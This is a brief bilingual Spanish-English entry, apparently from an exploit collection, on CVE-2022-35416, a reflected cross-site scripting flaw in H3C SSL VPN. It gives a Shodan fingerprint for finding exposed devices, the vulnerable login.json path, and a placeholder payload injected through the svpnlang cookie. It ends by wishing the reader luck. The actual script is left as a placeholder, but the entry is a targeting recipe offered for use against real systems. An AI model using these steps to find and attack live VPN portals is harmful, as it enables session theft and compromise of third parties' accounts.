
H3C_SSL_VPN_XSS(XSS Reflejado) CVE-2022-35416
H3C_SSL_VPN_XSS(Reflected XSS) CVE-2022-35416
Payload: Shodan: http.html_hash:510586239 Dirección de acceso:https://IP:PORT/wnm/login/login.json. Payload: Cookie: svpnlang=XSS_PAYLOAD
Descripción H3C SSL VPN hasta 2022-07-10 permite XSS mediante la cookie svpnlang en wnm/login/login.json.
¡Buena suerte!